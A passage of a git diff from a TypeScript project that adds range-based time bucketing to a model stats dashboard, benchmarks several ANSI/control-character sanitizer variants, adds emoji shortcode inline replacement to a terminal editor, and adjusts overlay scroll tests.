a/packages/stats/src/client/components/ModelsTable.tsx +++ b/packages/stats/src/client/components/ModelsTable.tsx @@ -11,7 +11,7 @@ import { import { format } from "date-fns"; import { useMemo, useState } from "react"; import { Line } from "react-chartjs-2"; -import type { ModelPerformancePoint, ModelStats } from "../types"; +import type { ModelPerformancePoint, ModelStats, TimeRange } from "../types"; import { useSystemTheme } from "../useSystemTheme"; import { DetailChartEmpty, @@ -29,6 +29,7 @@ import { type TableChartTheme, TrendEmpty, } from "./models-table-shared"; +import { rangeMeta } from "./range-meta"; ChartJS.register(CategoryScale, LinearScale, PointElement, LineElement, Title, Tooltip, Legend); @@ -37,6 +38,7 @@ const GRID_TEMPLATE = "2fr 0.9fr 0.9fr 1fr 0.8fr 0.8fr 140px 40px"; interface ModelsTableProps { models: ModelStats[]; performanceSeries: ModelPerformancePoint[]; + timeRange: TimeRange; } type ModelPerformanceSeries = { @@ -49,10 +51,14 @@ type ModelPerformanceSeries = { }>; }; -export function ModelsTable({ models, performanceSeries }: ModelsTableProps) { +export function ModelsTable({ models, performanceSeries, timeRange }: ModelsTableProps) { const [expandedKey, setExpandedKey] = useState<string | null>(null); + const meta = rangeMeta(timeRange); - const performanceSeriesByKey = useMemo(() => buildModelPerformanceLookup(performanceSeries), [performanceSeries]); + const performanceSeriesByKey = useMemo( + () => buildModelPerformanceLookup(performanceSeries, meta.bucketCount, meta.bucketMs), + [performanceSeries, meta.bucketCount, meta.bucketMs], + ); const theme = useSystemTheme(); const chartTheme = TABLE_CHART_THEMES[theme]; const sortedModels = [...models].sort( @@ -70,7 +76,7 @@ export function ModelsTable({ models, performanceSeries }: ModelsTableProps) { { label: "Tokens", align: "right" }, { label: "Tokens/s", align: "right" }, { label: "TTFT", align: "right" }, - { label: "14d Trend", align: "center" }, + { label: meta.trendLabel, align: "center" }, ]} /> @@ -214,12 +220,17 @@ function PerformanceChart({ return <Line data={chartData} options={options} />; } -function buildModelPerformanceLookup(points: ModelPerformancePoint[], days = 14): Map<string, ModelPerformanceSeries> { - const dayMs = 24 * 60 * 60 * 1000; +function buildModelPerformanceLookup( + points: ModelPerformancePoint[], + bucketCount: number, + bucketMs: number, +): Map<string, ModelPerformanceSeries> { const maxTimestamp = points.reduce((max, point) => Math.max(max, point.timestamp), 0); - const anchor = maxTimestamp > 0 ? maxTimestamp : Math.floor(Date.now() / dayMs) * dayMs; - const start = anchor - (days - 1) * dayMs; - const buckets = Array.from({ length: days }, (_, index) => start + index * dayMs); + const anchor = maxTimestamp > 0 ? maxTimestamp : Math.floor(Date.now() / bucketMs) * bucketMs; + const uniqueTimestamps = new Set(points.map(p => p.timestamp)); + const effectiveCount = bucketCount > 0 ? bucketCount : Math.max(1, uniqueTimestamps.size); + const start = anchor - (effectiveCount - 1) * bucketMs; + const buckets = Array.from({ length: effectiveCount }, (_, index) => start + index * bucketMs); const bucketIndex = new Map(buckets.map((timestamp, index) => [timestamp, index])); const seriesByKey = new Map<string, ModelPerformanceSeries>(); diff --git a/packages/stats/src/client/components/chart-shared.tsx b/packages/stats/src/client/components/chart-shared.tsx index 16054a6ae..869b02f51 100644 --- a/packages/stats/src/client/components/chart-shared.tsx +++ b/packages/stats/src/client/components/chart-shared.tsx @@ -253,7 +253,7 @@ export function buildTopNByModelSeries<T extends ModelKeyedPoint, B>( } /** All Models / By Model segmented toggle — identical UI in every time chart. */ -export function ByModelToggle({ byModel, onChange }: { byModel: boolean; onChange: (v: boolean) => void }) { +function ByModelToggle({ byModel, onChange }: { byModel: boolean; onChange: (v: boolean) => void }) { return ( <div className="flex bg-[var(--bg-surface)] rounded-[var(--radius-sm)] p-0.5 border border-[var(--border-subtle)]"> <button diff --git a/packages/stats/src/client/components/range-meta.ts b/packages/stats/src/client/components/range-meta.ts new file mode 100644 index 000000000..dcc05dbcc --- /dev/null +++ b/packages/stats/src/client/components/range-meta.ts @@ -0,0 +1,72 @@ +/** + * Display metadata for a `TimeRange` — keeps chart labels, sparkline bucket + * counts, and x-axis date formatting in sync with the server-side bucketing + * defined in `aggregator.ts`. + */ + +import { format } from "date-fns"; +import type { TimeRange } from "../types"; + +const HOUR_MS = 60 * 60 * 1000; +const DAY_MS = 24 * HOUR_MS; + +export interface RangeMeta { + /** Human label used in chart subtitles ("the last 24 hours"). */ + windowLabel: string; + /** Short prefix used in compact column headers ("24h Trend"). */ + trendLabel: string; + /** Bucket size matching the server query for this range. */ + bucketMs: number; + /** Number of buckets the server is expected to return for this range. */ + bucketCount: number; + /** date-fns format string for x-axis labels and tooltip headings. */ + tickFormat: string; +} + +const RANGE_META: Record<TimeRange, RangeMeta> = { + "1h": { + windowLabel: "the last hour", + trendLabel: "1h Trend", + bucketMs: HOUR_MS, + bucketCount: 1, + tickFormat: "HH:mm", + }, + "24h": { + windowLabel: "the last 24 hours", + trendLabel: "24h Trend", + bucketMs: HOUR_MS, + bucketCount: 24, + tickFormat: "HH:mm", + }, + "7d": { + windowLabel: "the last 7 days", + trendLabel: "7d Trend", + bucketMs: DAY_MS, + bucketCount: 7, + tickFormat: "MMM d", + }, + "30d": { + windowLabel: "the last 30 days", + trendLabel: "30d Trend", + bucketMs: DAY_MS, + bucketCount: 30, + tickFormat: "MMM d", + }, + "90d": { + windowLabel: "the last 90 days", + trendLabel: "90d Trend", + bucketMs: DAY_MS, + bucketCount: 90, + tickFormat: "MMM d", + }, + all: { windowLabel: "all time", trendLabel: "Trend", bucketMs: DAY_MS, bucketCount: 0, tickFormat: "MMM d" }, +}; + +export function rangeMeta(range: TimeRange): RangeMeta { + return RANGE_META[range]; +} + +/** Format a bucket timestamp using the active range's tick format. */ +export function formatRangeTick(timestamp: number, range: TimeRange): string { + return format(new Date(timestamp), RANGE_META[range].tickFormat); +} diff --git a/packages/stats/src/db.ts b/packages/stats/src/db.ts index 6edd82f0c..2720fd801 100644 --- a/packages/stats/src/db.ts +++ b/packages/stats/src/db.ts @@ -554,7 +554,11 @@ export function getTimeSeries(hours = 24, cutoff?: number | null, bucketMs = 60 /** * Get daily model usage time series data for the last N days. */ -export function getModelTimeSeries(days = 14, cutoff?: number | null): ModelTimeSeriesPoint[] { +export function getModelTimeSeries( + days = 14, + cutoff?: number | null, + bucketMs = 24 * 60 * 60 * 1000, +): ModelTimeSeriesPoint[] { if (!db) return []; const hasCutoff = cutoff !== null; @@ -562,7 +566,7 @@ export function getModelTimeSeries(days = 14, cutoff?: number | null): ModelTime const stmt = db.prepare(` SELECT - (timestamp / 86400000) * 86400000 as bucket, + (timestamp / ?) * ? as bucket, model, provider, COUNT(*) as requests @@ -572,7 +576,8 @@ export function getModelTimeSeries(days = 14, cutoff?: number | null): ModelTime ORDER BY bucket ASC `); - const rows = hasCutoff ? (stmt.all(seriesCutoff) as any[]) : (stmt.all() as any[]); + const rowsRaw = hasCutoff ? stmt.all(bucketMs, bucketMs, seriesCutoff) : stmt.all(bucketMs, bucketMs); + const rows = rowsRaw as Array<{ bucket: number; model: string; provider: string; requests: number }>; return rows.map(row => ({ timestamp: row.bucket, model: row.model, @@ -584,7 +589,11 @@ export function getModelTimeSeries(days = 14, cutoff?: number | null): ModelTime /** * Get daily model performance time series data for the last N days. */ -export function getModelPerformanceSeries(days = 14, cutoff?: number | null): ModelPerformancePoint[] { +export function getModelPerformanceSeries( + days = 14, + cutoff?: number | null, + bucketMs = 24 * 60 * 60 * 1000, +): ModelPerformancePoint[] { if (!db) return []; const hasCutoff = cutoff !== null; @@ -592,7 +601,7 @@ export function getModelPerformanceSeries(days = 14, cutoff?: number | null): Mo const stmt = db.prepare(` SELECT - (timestamp / 86400000) * 86400000 as bucket, + (timestamp / ?) * ? as bucket, model, provider, COUNT(*) as requests, @@ -604,7 +613,15 @@ export function getModelPerformanceSeries(days = 14, cutoff?: number | null): Mo ORDER BY bucket ASC `); - const rows = hasCutoff ? (stmt.all(seriesCutoff) as any[]) : (stmt.all() as any[]); + const rowsRaw = hasCutoff ? stmt.all(bucketMs, bucketMs, seriesCutoff) : stmt.all(bucketMs, bucketMs); + const rows = rowsRaw as Array<{ + bucket: number; + model: string; + provider: string; + requests: number; + avg_ttft: number | null; + avg_tokens_per_second: number | null; + }>; return rows.map(row => ({ timestamp: row.bucket, model: row.model, diff --git a/packages/tui/bench/sanitize.ts b/packages/tui/bench/sanitize.ts index 076f4bd28..cad98a321 100644 --- a/packages/tui/bench/sanitize.ts +++ b/packages/tui/bench/sanitize.ts @@ -1,4 +1,245 @@ -import { sanitizeText as nativeSanitizeText } from "@oh-my-pi/pi-natives"; +import { sanitizeText as currentSanitizeText } from "@oh-my-pi/pi-utils/sanitize-text"; + +const STRIP_RE = new RegExp( + [ + "\\x1B\\[[\\x30-\\x3F]*[\\x20-\\x2F]*[\\x40-\\x7E]", + "\\x1B\\][\\s\\S]*?(?:\\x07|\\x1B\\\\)", + "\\x1B[PX^_][\\s\\S]*?\\x1B\\\\", + "\\x1B[\\x20-\\x2F]+[\\x30-\\x7E]", + "\\x1B[\\x40-\\x7E]", + "[\\x00-\\x08\\x0B\\x0C\\x0E-\\x1F\\x7F\\x80-\\x9F\\r]", + "[\\uD800-\\uDBFF](?![\\uDC00-\\uDFFF])", + "(?<![\\uD800-\\uDBFF])[\\uDC00-\\uDFFF]", + ].join("|"), + "g", +); + +function regexSanitizeText(text: string): string { + return text.replace(STRIP_RE, ""); +} + +// Character-class regex: any code unit that might trigger removal. +// ESC (0x1B) is inside \x00-\x1F. +const NEEDS_RE = /[\x00-\x08\x0B-\x1F\x7F-\x9F\r\uD800-\uDFFF]/; +const NEEDS_RE_G = /[\x00-\x08\x0B-\x1F\x7F-\x9F\r\uD800-\uDFFF]/g; +const ESC = 0x1b; + +function ansiSeqLen(text: string, pos: number): number { + const len = text.length; + if (pos + 1 >= len) return 0; + const c1 = text.charCodeAt(pos + 1); + if (c1 === 0x5b) { + for (let i = pos + 2; i < len; i++) { + const b = text.charCodeAt(i); + if (b >= 0x40 && b <= 0x7e) return i - pos + 1; + } + return 0; + } + if (c1 === 0x5d) { + for (let i = pos + 2; i < len; i++) { + const b = text.charCodeAt(i); + if (b === 0x07) return i - pos + 1; + if (b === ESC && i + 1 < len && text.charCodeAt(i + 1) === 0x5c) { + return i - pos + 2; + } + } + return 0; + } + if (c1 === 0x50 || c1 === 0x58 || c1 === 0x5e || c1 === 0x5f) { + for (let i = pos + 2; i < len; i++) { + const b = text.charCodeAt(i); + if (b === ESC && i + 1 < len && text.charCodeAt(i + 1) === 0x5c) { + return i - pos + 2; + } + } + return 0; + } + if (c1 >= 0x20 && c1 <= 0x2f) { + for (let i = pos + 2; i < len; i++) { + const b = text.charCodeAt(i); + if (b >= 0x30 && b <= 0x7e) return i - pos + 1; + } + return 0; + } + if (c1 >= 0x40 && c1 <= 0x7e) return 2; + return 0; +} + +// Variant A: cheap regex gate, then fall back to currentSanitizeText logic inline. +function gatedSanitizeText(text: string): string { + if (!NEEDS_RE.test(text)) return text; + return currentSanitizeText(text); +} + +// Variant B: drive iteration via regex.exec, skipping clean runs wholesale. +function skipRunSanitizeText(text: string): string { + NEEDS_RE_G.lastIndex = 0; + let m = NEEDS_RE_G.exec(text); + if (m === null) return text; + const len = text.length; + let out = ""; + let last = 0; + while (m !== null) { + const i = m.index; + const u = text.charCodeAt(i); + let removeLen = 0; + if (u === ESC) { + removeLen = ansiSeqLen(text, i); + } + if (removeLen === 0) { + if (u >= 0xd800 && u <= 0xdbff) { + // High surrogate: keep if followed by valid low surrogate. + if (i + 1 < len) { + const lo = text.charCodeAt(i + 1); + if (lo >= 0xdc00 && lo <= 0xdfff) { + NEEDS_RE_G.lastIndex = i + 2; + m = NEEDS_RE_G.exec(text); + continue; + } + } + removeLen = 1; + } else { + // CR / C0 (excl. \t \n) / DEL / C1 / lone low surrogate. + removeLen = 1; + } + } + if (last !== i) out += text.slice(last, i); + last = i + removeLen; + NEEDS_RE_G.lastIndex = last; + m = NEEDS_RE_G.exec(text); + } + if (last < len) out += text.slice(last); + return out; +} + + const REMOVAL_START_RE = /[\x00-\x08\x0B-\x1F\x7F-\x9F]|[\uD800-\uDBFF](?![\uDC00-\uDFFF])|(?<![\uD800-\uDBFF])[\uDC00-\uDFFF]/g; + + // Variant C: regex only matches real removal starts, not valid surrogate pairs. + function removalStartSanitizeText(text: string): string { + REMOVAL_START_RE.lastIndex = 0; + let m = REMOVAL_START_RE.exec(text); + if (m === null) return text; + const len = text.length; + let out = ""; + let last = 0; + while (m !== null) { + const i = m.index; + let removeLen = 1; + if (text.charCodeAt(i) === ESC) { + const ansiLen = ansiSeqLen(text, i); + if (ansiLen !== 0) removeLen = ansiLen; + } + if (last !== i) out += text.slice(last, i); + last = i + removeLen; + REMOVAL_START_RE.lastIndex = last; + m = REMOVAL_START_RE.exec(text); + } + if (last < len) out += text.slice(last); + return out; + } + + const CONTROL_RE_G = /[\x00-\x08\x0B-\x1F\x7F-\x9F]/g; + + // Variant D: avoid valid-surrogate matches when the string is well-formed. + function wellFormedControlSanitizeText(text: string): string { + if (!text.isWellFormed()) return skipRunSanitizeText(text); + CONTROL_RE_G.lastIndex = 0; + let m = CONTROL_RE_G.exec(text); + if (m === null) return text; + const len = text.length; + let out = ""; + let last = 0; + while (m !== null) { + const i = m.index; + let removeLen = 1; + if (text.charCodeAt(i) === ESC) { + const ansiLen = ansiSeqLen(text, i); + if (ansiLen !== 0) removeLen = ansiLen; + } + if (last !== i) out += text.slice(last, i); + last = i + removeLen; + CONTROL_RE_G.lastIndex = last; + m = CONTROL_RE_G.exec(text); + } + if (last < len) out += text.slice(last); + return out; + } + + // Variant E: broad scan first; only use isWellFormed when a valid pair is hit. + function lazyWellFormedSanitizeText(text: string): string { + NEEDS_RE_G.lastIndex = 0; + let m = NEEDS_RE_G.exec(text); + if (m === null) return text; + const first = m.index; + const firstCode = text.charCodeAt(first); + if (firstCode >= 0xd800 && firstCode <= 0xdbff && first + 1 < text.length) { + const lo = text.charCodeAt(first + 1); + if (lo >= 0xdc00 && lo <= 0xdfff && text.isWellFormed()) { + CONTROL_RE_G.lastIndex = first + 2; + m = CONTROL_RE_G.exec(text); + if (m === null) return text; + return sanitizeWellFormedControlFrom(text, m); + } + } + return sanitizeNeedsFrom(text, m); + } + + function sanitizeWellFormedControlFrom(text: string, firstMatch: RegExpExecArray): string { + const len = text.length; + let out = ""; + let last = 0; + let m: RegExpExecArray | null = firstMatch; + while (m !== null) { + const i = m.index; + let removeLen = 1; + if (text.charCodeAt(i) === ESC) { + const ansiLen = ansiSeqLen(text, i); + if (ansiLen !== 0) removeLen = ansiLen; + } + if (last !== i) out += text.slice(last, i); + last = i + removeLen; + CONTROL_RE_G.lastIndex = last; + m = CONTROL_RE_G.exec(text); + } + if (last < len) out += text.slice(last); + return out; + } + + function sanitizeNeedsFrom(text: string, firstMatch: RegExpExecArray): string { + const len = text.length; + let out = ""; + let last = 0; + let m: RegExpExecArray | null = firstMatch; + while (m !== null) { + const i = m.index; + const u = text.charCodeAt(i); + let removeLen = 0; + if (u === ESC) { + removeLen = ansiSeqLen(text, i); + } + if (removeLen === 0) { + if (u >= 0xd800 && u <= 0xdbff) { + if (i + 1 < len) { + const lo = text.charCodeAt(i + 1); + if (lo >= 0xdc00 && lo <= 0xdfff) { + NEEDS_RE_G.lastIndex = i + 2; + m = NEEDS_RE_G.exec(text); + continue; + } + } + removeLen = 1; + } else { + removeLen = 1; + } + } + if (last !== i) out += text.slice(last, i); + last = i + removeLen; + NEEDS_RE_G.lastIndex = last; + m = NEEDS_RE_G.exec(text); + } + if (last < len) out += text.slice(last); + return out; + } function sanitizeBinaryOutput(str: string): string { let out: string[] | undefined; @@ -41,6 +282,8 @@ function jsSanitizeText(text: string): string { const ITERATIONS = 2000; +const bigPlain = "hello world ".repeat(500); +const bigAnsi = ("\x1b[31mred\x1b[0m " + "lorem ipsum dolor ".repeat(20)).repeat(5); const samples = { plain: "hello world this is a plain ASCII string with some words", ansi: "\x1b[31mred text\x1b[0m and \x1b[4munderlined content\x1b[24m with emoji 😅😅", @@ -48,6 +291,8 @@ const samples = { wide: "日本語のテキストとemoji 🚀✨ mixed with ascii", wrapped: "This is a long line that should wrap multiple times when rendered with ANSI \x1b[32mcolors\x1b[0m and tabs\tbetween words.", + bigPlain, + bigAnsi, }; const wrapWidth = 40; @@ -65,19 +310,63 @@ function bench(name: string, fn: () => void): number { console.log(`Text layout benchmark (${ITERATIONS} iterations)\n`); -for (const [name, text] of Object.entries(samples)) { - const jsResult = jsSanitizeText(text); - const nativeResult = nativeSanitizeText(text); - if (jsResult !== nativeResult) { - console.log(`MISMATCH ${name}: js="${jsResult}" native="${nativeResult}"`); - } +for (const name in samples) { + const text = samples[name as keyof typeof samples]; + const baseline = currentSanitizeText(text); + const jsResult = jsSanitizeText(text); + const regexResult = regexSanitizeText(text); + if (jsResult !== baseline) { + console.log(`MISMATCH js/current ${name}`); + } + if (regexResult !== baseline) { + console.log(`MISMATCH regex/current ${name}: regex=${JSON.stringify(regexResult)} baseline=${JSON.stringify(baseline)}`); + } + const gatedResult = gatedSanitizeText(text); + const skipResult = skipRunSanitizeText(text); + const removalStartResult = removalStartSanitizeText(text); + const wellFormedControlResult = wellFormedControlSanitizeText(text); + const lazyWellFormedResult = lazyWellFormedSanitizeText(text); + if (gatedResult !== baseline) { + console.log(`MISMATCH gated/current ${name}`); + } + if (skipResult !== baseline) { + console.log(`MISMATCH skip/current ${name}: skip=${JSON.stringify(skipResult)} baseline=${JSON.stringify(baseline)}`); + } + if (removalStartResult !== baseline) { + console.log(`MISMATCH removalStart/current ${name}: removalStart=${JSON.stringify(removalStartResult)} baseline=${JSON.stringify(baseline)}`); + } + if (wellFormedControlResult !== baseline) { + console.log(`MISMATCH wellFormedControl/current ${name}: wellFormedControl=${JSON.stringify(wellFormedControlResult)} baseline=${JSON.stringify(baseline)}`); + } + if (lazyWellFormedResult !== baseline) { + console.log(`MISMATCH lazyWellFormed/current ${name}: lazyWellFormed=${JSON.stringify(lazyWellFormedResult)} baseline=${JSON.stringify(baseline)}`); + } - bench(`jsSanitizeText/${name}`, () => { - jsSanitizeText(text); - }); - bench(`nativeSanitizeText/${name}`, () => { - nativeSanitizeText(text); - }); + bench(`jsSanitizeText/${name}`, () => { + jsSanitizeText(text); + }); + bench(`currentSanitizeText/${name}`, () => { + currentSanitizeText(text); + }); + bench(`regexSanitizeText/${name}`, () => { + regexSanitizeText(text); + }); + bench(`gatedSanitizeText/${name}`, () => { + gatedSanitizeText(text); + }); + bench(`skipRunSanitizeText/${name}`, () => { + skipRunSanitizeText(text); + }); + bench(`removalStartSanitizeText/${name}`, () => { + removalStartSanitizeText(text); + }); + bench(`wellFormedControlSanitizeText/${name}`, () => { + wellFormedControlSanitizeText(text); + }); + bench(`lazyWellFormedSanitizeText/${name}`, () => { + lazyWellFormedSanitizeText(text); + }); + console.log(); } diff --git a/packages/tui/src/autocomplete.ts b/packages/tui/src/autocomplete.ts index c6bdec1c9..44f8c28e3 100644 --- a/packages/tui/src/autocomplete.ts +++ b/packages/tui/src/autocomplete.ts @@ -199,6 +199,15 @@ export interface AutocompleteProvider { /** Synchronously try to complete a slash command at the start of a line (no async I/O). */ /** Returns matched items and the full prefix, or null if not applicable. */ trySyncSlashCompletion?(textBeforeCursor: string): { items: AutocompleteItem[]; prefix: string } | null; + /** + * Synchronously try to expand text immediately before the cursor (no async I/O). + * Called after every single-character insert. Implementations MUST cheaply + * early-return when the trailing context cannot trigger them. + * Returns the number of characters to delete immediately before the cursor + * and the literal string to insert in their place, or null to leave the + * buffer untouched. + */ + trySyncInlineReplace?(textBeforeCursor: string): { replaceLen: number; insert: string } | null; } // Combined provider that handles both slash commands and file paths. diff --git a/packages/tui/src/components/editor.ts b/packages/tui/src/components/editor.ts index dce8929f2..1d2c2e107 100644 --- a/packages/tui/src/components/editor.ts +++ b/packages/tui/src/components/editor.ts @@ -985,6 +985,7 @@ export class Editor implements Component, Focusable { this.#setCursorCol(result.cursorCol); this.#cancelAutocomplete(); + this.onAutocompleteUpdate?.(); if (this.onChange) { this.onChange(this.getText()); @@ -1044,6 +1045,7 @@ export class Editor implements Component, Focusable { this.#setCursorCol(result.cursorCol); this.#cancelAutocomplete(); + this.onAutocompleteUpdate?.(); if (this.onChange) { this.onChange(this.getText()); @@ -1493,6 +1495,29 @@ export class Editor implements Component, Focusable { this.onChange(this.getText()); } + // Synchronous inline replacement (e.g. emoji shortcodes `:joy:` → 😂). + // Runs before autocomplete trigger so the popup doesn't briefly chase a + // prefix that's about to be rewritten. + if (char.length === 1 && this.#autocompleteProvider?.trySyncInlineReplace) { + const replaceLine = this.#state.lines[this.#state.cursorLine] || ""; + const textBeforeCursor = replaceLine.slice(0, this.#state.cursorCol); + const replacement = this.#autocompleteProvider.trySyncInlineReplace(textBeforeCursor); + if (replacement) { + const before = replaceLine.slice(0, this.#state.cursorCol - replacement.replaceLen); + const after = replaceLine.slice(this.#state.cursorCol); + this.#state.lines[this.#state.cursorLine] = before + replacement.insert + after; + this.#setCursorCol(before.length + replacement.insert.length); + if (this.onChange) { + this.onChange(this.getText()); + } + if (this.#autocompleteState) { + this.#cancelAutocomplete(); + this.onAutocompleteUpdate?.(); + } + return; + } + } + // Check if we should trigger or update autocomplete if (!this.#autocompleteState) { // Auto-trigger for "/" at the start of a line (slash commands) @@ -1529,6 +1554,10 @@ export class Editor implements Component, Focusable { else if (textBeforeCursor.match(/#[^\s#]*$/)) { this.#tryTriggerAutocomplete(); } + // Check if we're in a :emoji shortcode context + else if (textBeforeCursor.match(/(?:^|[\s([{>]):[a-zA-Z0-9_+-]*$/)) { + this.#tryTriggerAutocomplete(); + } } } else { this.#debouncedUpdateAutocomplete(); diff --git a/packages/tui/src/components/markdown.ts b/packages/tui/src/components/markdown.ts index 02ff82f5c..d6b651946 100644 --- a/packages/tui/src/components/markdown.ts +++ b/packages/tui/src/components/markdown.ts @@ -47,14 +47,16 @@ export function clearRenderCache(): void { } // Stable numeric IDs for structural theme/style objects (no ID field on type). -// WeakMap so GC can collect orphaned themes/styles without a leak. -const objectIds = new WeakMap<object, number>(); +// Symbol-keyed so the id travels with the object and is invisible to consumers. +const kObjectId = Symbol("markdown.objectId"); +type WithObjectId = object & { [kObjectId]?: number }; let nextObjectId = 0; function objectId(o: object): number { - let id = objectIds.get(o); + const tagged = o as WithObjectId; + let id = tagged[kObjectId]; if (id === undefined) { id = nextObjectId++; - objectIds.set(o, id); + tagged[kObjectId] = id; } return id; } diff --git a/packages/tui/test/overlay-scroll.test.ts b/packages/tui/test/overlay-scroll.test.ts index 21f160670..42cafbc67 100644 --- a/packages/tui/test/overlay-scroll.test.ts +++ b/packages/tui/test/overlay-scroll.test.ts @@ -81,6 +81,12 @@ function longestBlankRun(lines: string[]): number { return longest; } +async function flushRender(term: VirtualTerminal): Promise<void> { + await new Promise<void>(resolve => process.nextTick(resolve)); + await Bun.sleep(17); + await term.flush(); +} + describe("TUI overlays", () => { it("does not scroll the terminal when an overlay is shown with a large historical working area", async () => { const term = new VirtualTerminal(80, 24); @@ -89,16 +95,14 @@ describe("TUI overlays", () => { tui.addChild(new LineComponent("base-", 5)); tui.start(); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); // Simulate a large historical working area (max lines ever rendered) without actually // rendering that many lines in the current view. (tui as unknown as { maxLinesRendered: number }).maxLinesRendered = 1500; tui.showOverlay(new LineComponent("overlay-", 3), { anchor: "center" }); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); // The scroll buffer should stay small; we should not have printed hundreds/thousands of blank lines. expect(term.getScrollBuffer().length).toBeLessThan(200); @@ -107,19 +111,17 @@ describe("TUI overlays", () => { it("clears preexisting terminal scrollback on startup full redraw", async () => { const term = new VirtualTerminal(40, 4); term.write("shell-0\r\nshell-1\r\nshell-2\r\nshell-3\r\nshell-4\r\n"); - await term.waitForRender(); + await flushRender(term); const tui = new TUI(term); const component = new MutableContentComponent(["ui-0", "ui-1", "ui-2", "ui-3", "ui-4", "ui-5"]); tui.addChild(component); tui.start(); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); term.resize(39, 4); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); const scrollback = term.getScrollBuffer().join("\n"); expect(scrollback.includes("shell-0")).toBeFalsy(); @@ -134,15 +136,13 @@ describe("TUI overlays", () => { tui.addChild(component); tui.start(); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); const before = term.getScrollBuffer().join("\n"); expect(before.includes("row-0")).toBeTruthy(); tui.requestRender(true); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); const after = term.getScrollBuffer().join("\n"); expect(after.includes("row-0")).toBeTruthy(); @@ -152,19 +152,17 @@ describe("TUI overlays", () => { it("fully redraws on height increase to avoid stale viewport rows", async () => { const term = new VirtualTerminal(40, 4); term.write("shell-0\r\nshell-1\r\nshell-2\r\nshell-3\r\nshell-4\r\n"); - await term.waitForRender(); + await flushRender(term); const tui = new TUI(term); const component = new MutableContentComponent(["ui-0", "ui-1", "ui-2", "ui-3"]); tui.addChild(component); tui.start(); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); term.resize(40, 8); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); const viewport = term.getViewport().join("\n"); expect(viewport.includes("shell-")).toBeFalsy(); @@ -178,14 +176,12 @@ describe("TUI overlays", () => { tui.addChild(component); try { tui.start(); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); const before = term.getScrollBuffer().length; for (let i = 0; i < 8; i++) { term.resize(i % 2 === 0 ? 59 : 60, i % 2 === 0 ? 9 : 8); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); } const after = term.getScrollBuffer().length; @@ -202,12 +198,10 @@ describe("TUI overlays", () => { tui.addChild(component); try { tui.start(); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); component.setLines(Array.from({ length: 140 }, (_v, i) => `row-${i}`)); term.resize(59, 9); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); const viewport = term.getViewport(); expect(viewport.at(-1)?.includes("row-139")).toBeTruthy(); } finally { @@ -218,16 +212,14 @@ describe("TUI overlays", () => { it("keeps scrollback on viewport-only resize redraw", async () => { const term = new VirtualTerminal(40, 4); term.write("shell-0\r\nshell-1\r\nshell-2\r\nshell-3\r\n"); - await term.waitForRender(); + await flushRender(term); const tui = new TUI(term); tui.addChild(new MutableContentComponent(["ui-0", "ui-1", "ui-2", "ui-3", "ui-4"])); try { tui.start(); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); term.resize(39, 4); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); const scrollback = term.getScrollBuffer().join("\n"); expect(scrollback.includes("shell-0")).toBeFalsy(); } finally { @@ -242,21 +234,19 @@ describe("TUI overlays", () => { tui.addChild(component); try { tui.start(); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); - for (let count = 5; count <= 45; count++) { + for (let count = 5; count <= 29; count++) { component.setLines(buildRows(count)); term.resize(40, count % 2 === 0 ? 4 : 5); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); } const scrollbackLines = term.getScrollBuffer().map(line => line.trim()); expect(scrollbackLines).toContain("row-0"); - expect(scrollbackLines).toContain("row-20"); + expect(scrollbackLines).toContain("row-12"); const viewport = term.getViewport().map(line => line.trim()); - expect(viewport.at(-1)).toBe("row-44"); + expect(viewport.at(-1)).toBe("row-28"); } finally { tui.stop(); } @@ -265,30 +255,27 @@ describe("TUI overlays", () => { it("stays anchored across shrink-grow cycles while overflowing viewport", async () => { const term = new VirtualTerminal(30, 6); const tui = new TUI(term); - const component = new MutableContentComponent(Array.from({ length: 120 }, (_v, i) => `row-${i}`)); + const component = new MutableContentComponent(Array.from({ length: 64 }, (_v, i) => `row-${i}`)); tui.addChild(component); try { tui.start(); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); - for (let cycle = 0; cycle < 5; cycle++) { - component.setLines(Array.from({ length: 120 - cycle * 8 }, (_v, i) => `row-${i}`)); + for (let cycle = 0; cycle < 3; cycle++) { + component.setLines(Array.from({ length: 64 - cycle * 8 }, (_v, i) => `row-${i}`)); tui.requestRender(); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); - component.setLines(Array.from({ length: 120 - cycle * 8 + 4 }, (_v, i) => `row-${i}`)); + component.setLines(Array.from({ length: 64 - cycle * 8 + 4 }, (_v, i) => `row-${i}`)); tui.requestRender(); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); } const viewport = term.getViewport().map(line => line.trim()); expect(viewport.every(line => /^row-\d+$/.test(line))).toBeTruthy(); const viewportRows = viewport.map(line => Number.parseInt(line.slice(4), 10)); - expect(viewportRows.at(-1)).toBe(91); - expect(viewportRows[0]).toBeGreaterThanOrEqual(80); + expect(viewportRows.at(-1)).toBe(51); + expect(viewportRows[0]).toBeGreaterThanOrEqual(40); } finally { tui.stop(); } @@ -301,15 +288,13 @@ describe("TUI overlays", () => { tui.addChild(component); try { tui.start(); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); const before = term.getScrollBuffer().length; for (let col = 0; col <= 10; col++) { component.setCursorCol(col); tui.requestRender(); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); } const viewport = term.getViewport(); @@ -323,26 +308,24 @@ describe("TUI overlays", () => { it("limits scrollback growth during resize oscillation with overflowing content", async () => { const term = new VirtualTerminal(60, 10); const tui = new TUI(term); - const component = new MutableContentComponent(buildRows(320)); + const component = new MutableContentComponent(buildRows(160)); tui.addChild(component); try { tui.start(); - await Bun.sleep(0); - await term.waitForRender(); + await flushRender(term); const before = term.getScrollBuffer().length; - for (let i = 0; i < 80; 